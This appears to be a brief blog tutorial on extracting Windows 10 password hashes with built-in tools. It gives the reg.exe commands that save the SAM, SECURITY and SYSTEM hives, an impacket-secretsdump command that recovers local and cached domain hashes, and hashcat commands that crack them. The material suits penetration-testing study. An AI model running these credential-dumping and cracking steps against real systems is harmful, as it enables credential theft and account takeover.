I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it with internal Windows tools if you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes.
We start at first with the short version
- Export SAM with reg.exe
- Convert SAM with impacket-secretsdump to get to the hashes
- Use hashcat to crack the hashes
We start first with exporting the sam database with reg.exe
reg.exe save hklm\sam c:\tmp\sam.save reg.exe save hklm\security c:\tmp\security.save reg.exe save hklm\system c:\tmp\system.save
It is time to get the hashes out from these files.
Transfer the files to machine that have impacket installed. We need to extract the hashes from these 3 files. I use impacket-secretdump and the output is roger.hash
impacket-secretsdump -sam ./sam.save -security ./security.save -system ./system.save LOCAL > roger.hash
Now we have a file roger.hash that have local accounts and cached domain haches.
Use hashcat to crack the hashes
For local accounts we copy the hashes into a file local.hash.
For cached accounts we do the same. As you can see we remove the domain and stuff so that the line begins with C2$
Now it is time to crack the hashes. For local accounts we use -m 1000 for cached accounts we use -m 2100
Cached account with password file
hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt
Cached account with brute force without any mask (guess.mask)
hashcat -m 2100 -a 3 ./cached.hash
The same for local except mode is -m 1000
I hope this help someone out there!